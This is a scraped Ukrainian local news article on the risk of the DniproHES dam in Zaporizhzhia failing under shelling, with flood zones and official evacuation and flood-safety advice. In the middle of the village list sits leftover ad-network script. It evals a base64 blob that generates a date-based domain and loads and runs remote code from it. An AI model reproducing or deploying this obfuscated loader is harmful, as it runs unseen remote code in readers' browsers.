Чому не слід панікувати, що ДніпроГЕС у Запоріжжі прорве внаслідок обстрілів (ОГЛЯД)

Росіяни після поразки на Харківщині вже вдарили по кільком об’єктам критичної інфраструктури. У Кривому Розі ракети влучили у гідроспоруди, місто частково затопило, а на Харківщині обстріляли ТЕЦ. Жителі Запоріжжя закономірно можуть перейматися через можливі обстріли ДніпроГЕС.

«Акцент» пояснює, чому хвилюватися про затоплення Запоріжжя не слід.

Справа в тому, що греблі проектувалися у часи, коли існував ризик збройної агресії, СРСР знаходився у стані «холодної війни». Як розповідає експерт Максим Морока, червоній армії свого часу знадобилося аж 20 тонн вибухівки, аби зруйнувати частну ДніпроГЕС. Тому ракети великої дальності і артобстріли у цьому плані не нададуть бажаного результату.

До речі, про міцність таких споруд можна зробити висновки, аналізуючи ситуацію з Антонівським мостом поблизу Херсона. ЗСУ для того, щоб вивести його з ладу, знадобилося тривалий час постійно тримати вогневий контроль над переправою.

Для ДніпроГЕСу загроза може полягати в іншому: у разі прориву греблі Кременчуцького водосховища хвиля з 6 годин 18 хвилин дійде до греблі у Запоріжжі. Вже за 20 годин вода може дійти до критичного рівня — 53 метри. Таким чиному у запоріжців буде близко доби, щоб евакуюватися або підготуватися до затоплення. Коли вода досягне критичного рівня, ДніпроГЕС буде зруйновано, і розпочнеться затоплення нижнього б’єфу району по Каховському водосховищу.

Важливо, що Кременчуцьке водосховище знаходиться далі від лінії фронту, а гребля також витримає удари артилерії та ракет.

Що буде у разі прориву ДніпроГЕС

Існують поняття про «зони катастрофічного затоплення». До неї патрапляють території Комунарського, Олександрівського, Дніпровського та Вознесенівського районів Запоріжжя. Список адрес, які знаходяться у зоні ризику, є на сайті міської ради. Їх ми залишимо нижче.

А також, як пишуть на сайті районної адміністрації, в зону катастрофічного затоплення потрапляють наступні населені пункти району: var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

с. Нижня Хортицяс. Розумівкас. Бабуркас. Канівськес. Лисогіркас. Біленьке Першес. Біленькес. Червонодніпровкасмт. Балабинесмт. Кушугумсмт. Малокатеринівкас. Григорівкас. Веселянкас. Річнес. Юльївка

Розраховано, що підйом води у зонах затоплення може досягти 8-12 метрів. Протягом 2-4 діб має відбутися поступовий спад.

» Відповідно пунктів 3 та 4 Порядку проведення евакуації у разі загрози виникнення або виникнення надзвичайних ситуацій, затвердженому постановою Кабінету Міністрів України від 30.10.2013 № 841, проводиться обов’язкова (п. 3) загальна (п. 4) евакуація населення із зони катастрофічного затоплення населених пунктів у разі руйнування гідротехнічних (гідрозахисних) споруд, хвиля прориву яких може досягнути зазначених населених пунктів менше ніж за чотири години.» — йдеться на сайті Запорізької районної адміністрації.

Крім того, на сайті «Нова Україна. Інститут стратегічних досліджень» вказують, що у разі прориву ДніпроГЕС, на Запорізькій АЕС може виникнути аварія.

«Від гідроудару та закінчення величезної кількості води дамби будуть розмиті, рівень води в Каховському морі після такого катаклізму сильно знизиться. Ставок-охолоджувач Запорізької АЕС залишиться без води, що призведе до аварії за типом Фукусіми у зв’язку з проблемою охолодження шести реакторів-мільйонників» — йдеться у дослідженні.

Дії у разі прориву греблі

Дії в зоні раптового затоплення під час повені, паводка, які рекомендують на сайті міської ради Запоріжжя:

зберігати спокій, уникати паніки; швидко зібрати необхідні документи, цінності, ліки, продукти та інші необхідні речі; надати допомогу дітям, інвалідам та людям похилого віку. Вони підлягають евакуації в першу чергу; за можливістю негайно залишити зону затоплення; перед виходом з будинку вимкнути електро — та газопостачання, загасити вогонь у грубах. Зачинити вікна та двері, якщо є час – закрити вікна та двері першого поверху дошками (щитами); відчинити хлів — дайте худобі можливість врятуватися; піднятись на верхні поверхи. Якщо будинок одноповерховий, зайняти горищні приміщення; до прибуття допомоги залишайтесь на верхніх поверхах, дахах, деревах чи інших підвищеннях, сигналізуйте рятувальникам, щоб вони мали змогу швидко вас знайти; перевірте чи немає поблизу постраждалих, надайте їм, за можливістю, допомогу; потрапивши у воду, зніміть з себе важкий одяг і взуття, відшукайте поблизу предмети, якими можна скористатися до надходження допомоги; не переповнюйте рятувальні засоби (катери, човни, плоти тощо). Дії після повені, паводка: переконайтесь, що житло не отримало внаслідок повені ушкоджень та не загрожує заваленням, відсутні провалини в будинку і навколо нього, не розбите скло і немає небезпечних уламків та сміття; не слід користуватись електромережею до повного осушення будинку; обов’язково кип’ятіть питну воду, особливо з джерел водопостачання, які були підтоплені; просушити будинок, провести ретельне очищення та дезінфекцію забрудненого посуду і домашніх речей та прилеглої до будинку території; здійснюйте осушення затоплених підвальних приміщень поетапно (з розрахунку 1/3 об’єму води на добу); електроприладами користуйтесь тільки після їх ретельного просушування; заборонено вживати продукти, які були підтоплені водою під час повені. Позбавтесь від них та від консервації, що була затоплена водою і отримала ушкодження; все майно, яке було затопленим, підлягає дезінфекції; дізнайтесь у місцевих органах державної влади та місцевого самоврядування адреси організацій, що відповідають за надання допомоги постраждалому населенню.

Фото: ЦМКФФА України ім. Г. С. Пшеничного (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/chomu-ne-slid-panikuvati-shho-dniproges-u-zaporizhzhi-prorve-vnaslidok-obstriliv-oglyad/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top